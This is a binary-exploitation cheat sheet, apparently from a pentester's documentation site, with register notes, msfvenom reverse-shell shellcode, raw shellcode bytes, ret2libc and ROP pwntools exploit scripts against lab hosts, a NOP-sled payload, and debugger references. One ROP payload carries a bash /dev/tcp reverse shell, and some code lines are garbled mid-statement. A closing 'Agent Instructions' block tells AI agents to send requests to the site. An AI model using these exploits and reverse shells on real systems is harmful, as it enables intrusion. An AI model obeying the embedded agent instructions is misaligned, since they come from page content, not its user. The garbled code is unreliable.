# Linux ## Very Basic * General Purpose Registers (GPRs)
32-bit64-bitThese registers are used for various arithmetic, logical, and data movement operations.
EAXRAX

Accumulator Register

Used for arithmetic and logical operations. Stores the return value of functions. In mul and div operations, it stores multiplication results or dividend values.

EBXRBX

Base Register
Used as a pointer to data in memory.

Can store memory addresses in some instructions.

ECXRCX

Counter Register
Commonly used for loop counters in LOOP instructions.

Used as a count value for string operations and shifts/rotations.

EDXRDX

Data Register

Often used in mul and div operations for storing high-order bits of results.

Used for I/O operations with in and out instructions.

ESIRSI

Source Index Register

Points to source data in string operations like movs, cmps, and scas.

Can be used for general-purpose indexing.

EDIRDI

Destination Index Register
Points to destination data in string operations.

Used in movs, lods, and stos instructions.

* Stack and Execution Control Registers
32-bit64-bitThese registers control the flow of execution and stack operations.
ESPRSP

Stack Pointer
Holds the address of the top of the stack.

Automatically adjusted by push and pop instructions.

EBPRBP

Base Pointer
Used as a reference point for stack frames in function calls.

Maintains the base address of the current stack frame.

EIPRIP

Instruction Pointer

Stores the address of the next instruction to be executed.

Changes automatically after executing each instruction.

Can be manipulated using jmp, call, and ret.

* Segment Registers
#Segment registers store memory segment selectors.
CS

Code Segment

Points to the segment containing currently executing instructions.

DS

Data Segment

Points to the segment where data is stored.

SS

Stack Segment

Points to the segment containing the stack.

ES

Extra Segments

Additional segment registers used for different purposes.

* Flags Register (EFLAGS)
#The EFLAGS register contains status flags that control operations.
CF

Carry Flag

Set if an arithmetic operation generates a carry or borrow.

ZF

Zero Flag

Set if the result of an operation is zero.

SF

Sign Flag

Set if the result of an operation is negative.

OF

Overflow Flag

Set if signed arithmetic overflows.

PF

Parity Flag

Set if the number of set bits in the result is even.

DF

Direction Flag

Controls string operations (0 = increment, 1 = decrement).

* Special Purpose Registers
#These registers are used for specific control and system functions.
CR0–CR4

Control Registers

Control processor modes and memory management.

GDTR

Global Descriptor Table Register

Stores the base address of the GDT.

IDTR

Interrupt Descriptor Table Register

Stores the base address of the IDT.

LDTR

Local Descriptor Table Register

Points to the LDT.

TR

Task Register

Points to the current task state segment (TSS).

* Create shell code 
## ------------------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"    

## ------------------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"

## ------------------| Linux bit 32
SHELL_CODE  = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"

## ------------------| Linux bit 64
SHELL_CODE  = "\x50\x48\x31\xd2\x48\xbb\x2f"
SHELL_CODE += "\x62\x69\x6e\x2f\x2f\x73\x68"
SHELL_CODE += "\x53\x54\x5f\xb0\x3b\x0f\x05"
## 00. Basic Checks ```bash ## ------------------| CPU architecture information lscpu ## ------------------| I4-64 System Calls cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h ## ------------------| checksec info checksec --file= Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled <-- we can't drop shell code and jump to it; so use return to lib.c PIE: No PIE (0x8048000) ## ------------------| Disable ASLR (Address Space Layout Randomization) echo 0 > /proc/sys/kernel/randomize_va_space ## ------------------| Create pattern /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200 ## ------------------| Check offset value /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q ``` * Get all functions ```bash readelf -s BasicOne | grep FUNC ``` ## 01. **ret2libc** (NX enabled) ```bash ## ------------------| Check ASLR changing ? for i in {1..20}; do ldd | grep libc; done ``` * Return to `libc`\*\* \[ ASLR OFF ]\*\* ```python import struct # pwndbg + create cyclic + find offset junk = "A"*52 # ldd | grep libc <-- find the libc libc = 0xb7e19000 # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI system = struct.pack('| grep libc <-- find the libc libc = 0xb75b8000 # readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI system = struct.pack('## ------------------| Get running process memory values cat /proc/<PID>/maps ## ------------------| Find Variable Values ## head -1 /proc/<PID>/maps | awk -F\- '{print "0x"$1}' base = 0x<value> ## grep 'libc' /proc/15922/maps | head -1 | awk -F\- '{print "0x"$1}' libc_base = 0x<value> ## Download the libc file ## grep 'libc' /proc/15922/maps | head -1 | awk '{print $NF}' | xargs -I {} cp {} libc.so ## objdump -d libc.so | grep system | head -1 | awk '{print $1}' ## remove all 00s and replace it 0x. ( usually it's 0x(last 5 digits) libc_system = p64(libc_base + 0x<value>) ## ------------------| Find Gadgets ## Install ropper pip install ropper --break-system-packages ## Find RDI ## ropper -f libc.so --search "pop rdi; ret" pop_rdi = p64(libc_base + 0x<last 5 digits>) ## Find RDX ## ropper -f libc.so --search "pop rdx; ret" pop_rdx = p64(libc_base + 0x<last 5 digits>) ## Find Mov ## ropper -f libc.so --search "mov [rdi], rdx" mov = p64(libc_base + 0x<last 5 digits>) ## ------------------| Find writeble mem ## readelf -x .data <binary> writable = base + 0x<last 5 digits> ## ------------------| Final sample code from pwn import * offset = 520 base = 0x559b1a806000 libc_base = 0x7fbc1b8d9000 libc_system = p64(libc_base + 0x48e50) pop_rdi = p64(libc_base + 0x26796) pop_rdx = p64(libc_base + 0xcb1cd) mov = p64(libc_base + 0x3ace5) writable = base + 0x4000 cmd = b"bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'" rop = b"A" * offset for i in range(0, len(cmd), 8): rop += pop_rdi rop += p64(writable + i) rop += cmd[i:i+8].ljust(8, b"\x00") rop += mov rop += pop_rdi rop += p64(writable) rop += libc_system with open('license.key', 'wb') as f: f.write(rop) ## 02. NOP sled (NX disabled) ```bash ## ------------------| x86 Bit BUF_SIZE = 362 SHELL_CODE = "\x31\xc0\x50\x68\x2f\x2f\x73" SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89" SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b" SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80" EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE)) payload = NOP_SLED + SHELL_CODE + EIP print payload ``` ## 03. PWNtool Skeletons * `ret2libc` (32 bit) ```python #!/usr/bin/python3 from pwn import * context(terminal=['tmux','new-window']) #context(os='linux', arch='i386') # If programe in local mode #programe = gdb.debug('./myapp','b main') # IF programe to remote mode programe = remote('10.10.10.61',32812) junk = ("A" * 212).encode() # run gdb one then CTRL+C to brackground then type p system system = p32(0xf7e4c060) # type p exit on gdb exit = p32(0xf7e3faf0) # type find &system,+9999999,"sh" on gdb # select one and then type x/s 0xf7f6ddd5 binsh = p32(0xf7e3faf0) #programe.recvuntil('What do you want me to echo back?') programe.recvuntil('Enter Bridge Access Code:') programe.sendline("Something") programe.sendline(junk + system + exit + binsh) programe.interactive() ``` ```python from pwn import * #context(terminal=['tmux','new-window']) context(os='linux', arch='amd64') # Load programe in local mode programe = gdb.debug('./myapp','b main') # Load programe to remote mode programe = remote('10.10.10.147',1337) junk = ("A" * 112).encode() bin_sh = "/bin/sh\x00".encode() system = p64(0x40116e) pop_r13 = p64(0x401206) null = p64(0x0) test = p64(0x401152) #programe.recvuntil('What do you want me to echo back?') programe.sendline(junk + bin_sh + pop_r13 + system + null + null + test) programe.interactive() ``` ## 04. GDB * Basic 
## ------------------| Disassembly & Debugging
set disassembly-flavor intel   ### Use Intel syntax instead of AT&T.
disassemble <function>         ### Disassemble a function (or disas <function>).
layout asm                     ### Show an assembly view in TUI mode.
layout reg                     ### Show registers in TUI mode.

## ------------------| Breakpoints & Watchpoints
break <function>               ### Set a breakpoint at a function (or b <function>).
break *<address>               ### Set a breakpoint at a specific memory address.
break <filename>:<line>        ### Break at a specific line in a file.
info breakpoints               ### List all breakpoints (or info b).
delete <num>                   ### Remove a breakpoint (or d <num>).
watch <variable>               ### Break when a variable's value changes.
rwatch <variable>              ### Break when a variable is read.

## ------------------| Running & Controlling Execution
run [args]                     ### Start the program with optional arguments (or r).
continue                       ### Continue execution after a breakpoint (or c).
step                           ### Step into a function call (or s).
next                           ### Step over a function call (or n).
finish                         ### Run until the current function returns.
until <address>                ### Run until a specific address is reached.
kill                           ### Stop the running program.
quit                           ### Exit GDB.

## ------------------| Examining Registers & Memory
info registers                 ### Show all registers.
print $eax                     ### Show the value of a specific register.
x/<n><fmt> <address>           ### Examine memory:
x/10xw $esp                    ### Show 10 words in hex from the stack.
x/10i <address>                ### Show instructions (disassembly).
x/20s <address>                ### Show strings in memory.

## ------------------| Stack & Function Calls
backtrace                      ### Show the call stack (or bt).
frame <num>                    ### Switch to a specific stack frame.
info args                      ### Show function arguments.
info locals                    ### Show local variables in the current function.
return <value>                 ### Force a function to return a specific value.

## ------------------| Modifying Execution
set {type} <address> = <value> ### Modify memory (Example: set {int}0x804a080 = 1337)
set $eax = 0xdeadbeef          ### Modify a register.
jump *<address> (j *<address>) ### Jump execution to a different address.
call system("/bin/sh")         ### Call a function manually (e.g., pop a shell).

## ------------------| Searching in Memory
find <start>, <end>, <pattern> ### Search for a pattern in memory.
grep <string>                  ### Search for text in memory (if GDB supports grep).

## ------------------| Core Dumps
ulimit -c unlimited            ### Enable core dumps before running the program.
gdb <binary> <core>            ### Load a core dump for debugging.
info threads                   ### Show threads in the core dump.
* Exploit 
## ------------------| Find offset
#### Get the random chars 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
#### Run the application via gdb 
gdb <app_name>
r <random_chars>
#### get the below value 
## Program received signal SIGSEGV, Segmentation fault.
## <get_this_value> in ?? ()
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value_from_above>

## ------------------| Find EIP
#### Run the application using gdb
gdb <app_name>
r $(python -c 'print "A"*400')
x/100x $esp
x/100x $esp - 400
#### Check where the '0x41414141' value is begen. 
#### Re write as follow
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf
### 04.1 [GDB-Gef](https://hugsy.github.io/gef/) * Basic ```bash ## ------------------| Basic Commands gef config ### View or modify GEF configurations (e.g., `gef config gef.debug`). run ### Run the program with optional args (same as GDB: `run `). continue ### Resume execution after a breakpoint (same as GDB). next ### Step to the next source line, skipping functions (same as GDB). step ### Step into function calls (same as GDB). finish ### Run until current function returns (same as GDB). break ### Set a breakpoint (e.g., `break main` or `break *0xaddr`), same as GDB. delete ### Delete breakpoint by number (same as GDB). info breakpoints ### List all breakpoints (same as GDB). disassemble ### Disassemble a function (e.g., `disassemble main`), same as GDB but enhanced with GEF context. x/s
### Examine memory as a string (same as GDB). x/10x
### Examine 10 words of memory in hex (same as GDB). x/10i
### Examine 10 instructions at address (same as GDB). ## ------------------| Registers & Context context ### Show registers, stack, code, and more in a colorful layout (GEF-specific). registers ### Display all registers with values (GEF alias, shorter than GDB’s `info registers`). registers rax ### Show value of a specific register (e.g., `rax`)—syntax adjusted for GEF. vmmap ### Display virtual memory mappings of the process (GEF-specific). ## ------------------| Breakpoint & Execution Flow bp
### Set a breakpoint at an address (e.g., `bp 0xdeadbeef`, GEF shorthand for `break *`). breakpoint-dump ### List all breakpoints with details (GEF-specific, replaces `bpdump`). trace-run ### Trace execution flow or function calls (GEF-specific, replaces `tracecall`). ## ------------------| Exploiting & Debugging pattern create ### Creates a cyclic pattern of bytes (for buffer overflow exploitation). pattern offset ### Finds the offset of a value in a cyclic pattern. checksec ### Displays security protections (NX, PIE, RELRO, etc.). ropgadget ### Finds ROP gadgets in the binary. elfsymbol ### Lists symbols of the loaded binary. lookup ### Finds addresses of functions/symbols. ## ------------------| Memory & Stack Analysis heap ### Show heap info (chunks, bins, etc.), GEF-specific (replaces `heapinfo`). telescope
### Display memory around an address in a readable format (GEF-specific). ``` * Exploit ```bash ## ------------------| load programe gdb-gef ./myapp ## ------------------| Run programe run r ## ------------------| Create pattern pattern create 200 ## ------------------| Search RSP or EIP x/xg $rsp pattern offset ### or pattern search $rsp pattern search $eip pattern search qaaa pattern search 0x00007fffffffe288 ## ------------------| Show registers registers ``` ### 04.2 GDB-Peda * Basic ```bash ## ------------------| Basic Commands run ### Run the program with optional arguments. continue ### Continue execution after a breakpoint. next ### Step to the next line of code. step ### Step into function calls. finish ### Run until the function returns. break ### Set a breakpoint. delete ### Remove a breakpoint. info breakpoints ### List all breakpoints. disassemble ### Disassemble a function. x/s
### Examine memory as a string. x/10x
### Examine memory in hex (10 words). x/10i
### Examine memory as instructions. ## ------------------| Registers & Context context ### Displays registers, stack, and code. reg ### Shows all registers with values. reg rax ### Show the value of a specific register (e.g., rax). vmmap ### Displays the memory map of the binary. searchmem ### Searches for a value in memory. scanmem ### Search memory for pointers to a given value. stack ### Dumps values from the stack. ## ------------------| Breakpoint & Execution Flow bp
### Set a breakpoint at an address. bpdump ### Dumps all breakpoints. tracecall ### Trace function calls. ## ------------------| Exploiting & Debugging pattern create ### Creates a cyclic pattern of bytes (for buffer overflow exploitation). pattern offset ### Finds the offset of a value in a cyclic pattern. checksec ### Displays security protections (NX, PIE, RELRO, etc.). ropgadget ### Finds ROP gadgets in the binary. elfsymbol ### Lists symbols of the loaded binary. lookup ### Finds addresses of functions/symbols. ## ------------------| Memory & Stack Analysis heapinfo ### Displays heap information. dumprop ### Dumps ROP gadgets from a binary. find ### Find a value in memory. telescope
### Examine memory around an address. ``` * Exploit ```bash ## ------------------| load programe gdb-peda ./myapp ## ------------------| Run programe run r ## ------------------| Get memory address on system (!! run programe before get this) p system ## ------------------| Get memory address on bin/sh; get the value on libc : (!! run programe before get this) searchmem /bin/sh ## ------------------| Get memory address on exit p exit ``` ### 04.3 [PWNdbg](https://pwndbg.re) ```bash ------------------| Basic Commands run ### Run the program with optional arguments. continue ### Continue execution after a breakpoint (abbreviated as c in pwndbg). next ### Step to the next line of code (execute the next instruction without stepping into functions). step ### Step into function calls (execute the next instruction, descending into function calls). break ### Set a breakpoint at a specified location (e.g., break main or break *0xaddress). disassemble ### Display the assembly code for the current function or specified address (enhanced by pwndbg with argument annotation). x ### Examine memory at a specified address (e.g., x/10x $esp for 10 words in hex, improved by pwndbg’s hexdump). info ### Display information about the program (e.g., info registers or info breakpoints, augmented by pwndbg’s context). set ### Modify GDB settings or variables (e.g., set context-output /path/to/file for pwndbg output redirection). config ### Adjust pwndbg-specific parameters (e.g., config to list options like emulation or hexdump settings). context ### Show a summary of execution context (registers, stack, disassembly, etc., auto-triggered by pwndbg on stops). hexdump ### Display a detailed hexdump of memory at a given address (pwndbg’s enhanced version of GDB’s basic memory display). telescope ### Recursively dereference pointers from a memory address (e.g., telescope $esp to inspect stack contents). search ### Search memory for specific values or patterns (e.g., search 0xdeadbeef or search "string"). pwndbg ### List all pwndbg-specific commands available in the current session. ida ### Interact with IDA Pro via XMLRPC for synchronized debugging (e.g., ida to query symbols or comments). configfile ### Generate a persistent configuration file for pwndbg settings to include in .gdbinit. themefile ### Generate a persistent theme file for pwndbg to customize display output. ``` ## 05. OBJDump ``` objdump -D myapp | grep system ``` * Basic ```bash ## ------------------| Basic Commands objdump -d ### Disassemble the entire binary. objdump -D ### Disassemble all sections. objdump -x ### Display all headers (useful for debugging). objdump -s ### Display full contents of all sections. objdump -t ### Show the symbol table of the binary. objdump -r ### Show relocation entries. objdump -h ### Display section headers. objdump -p ### Display the program headers (useful for ELF binaries). objdump -f ### Display the file header information. ## ------------------| Disassembly & Analysis objdump -M intel -d ### Disassemble using Intel syntax. objdump -M intel -D ### Disassemble all sections with Intel syntax. objdump -M att -d ### Disassemble using AT&T syntax (default). objdump -C -t ### Demangle C++ symbols in the symbol table. objdump --syms ### Display only the symbols from the binary. objdump --section=.text -d ### Disassemble only the .text section. objdump --start-address= --stop-address= -d ### Disassemble from a specific range of addresses. ## ------------------| ELF & Headers Inspection objdump -T ### Show dynamic symbols (useful for shared libraries). objdump -R ### Show dynamic relocations (useful for PIE binaries). objdump -j .plt -d ### Disassemble only the Procedure Linkage Table (PLT). objdump -j .got -s ### Display the Global Offset Table (GOT). objdump -j .data -s ### Show contents of the .data section. objdump -j .bss -s ### Show contents of the .bss section. ## ------------------| Debugging & Reverse Engineering objdump --all-headers ### Show all headers, including ELF sections. objdump --private-headers ### Show private ELF headers. objdump -drwC ### Display disassembly with relocations and demangled symbols. objdump -dC --source ### Disassemble with source code (if available). ## ------------------| Other Useful Commands objdump -j
-s ### Display raw data of a specific section. objdump -D --no-show-raw-insn ### Disassemble but hide raw instructions. objdump -g ### Display debug sections (if present). ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/binary-exploitation/binary-exploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.